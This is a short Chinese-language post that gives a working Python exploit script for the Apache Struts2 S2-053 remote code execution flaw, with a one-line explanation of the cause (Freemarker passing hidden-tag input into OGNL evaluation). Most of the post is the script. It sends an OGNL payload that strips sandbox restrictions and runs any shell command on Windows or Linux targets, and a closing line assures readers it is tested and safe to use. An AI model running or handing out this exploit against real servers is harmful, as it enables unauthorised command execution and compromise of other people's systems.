st2-053 rce 利用
是由于Freemarker处理hidden标签的时候带入了ognl表达式执行之中产生了rce 这里写一个执行命令的exp 根据poc改的
# -*- coding:utf-8 -*-
import re,requests,sys
web=sys.argv[1]
param=sys.argv[2]
cmd='echo "[|"`'+sys.argv[3]+'`"|]"'
#print cmd
payload="%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}"
post_data={param:payload}
r=requests.post(web,data=post_data)
res=r.content
patter=re.compile("\[\|.*\|\]")
print patter.findall(res)[0]
print "cmd exec!"
复现过程参照st2-052 payload已经进行了关于os的测试 所以放心使用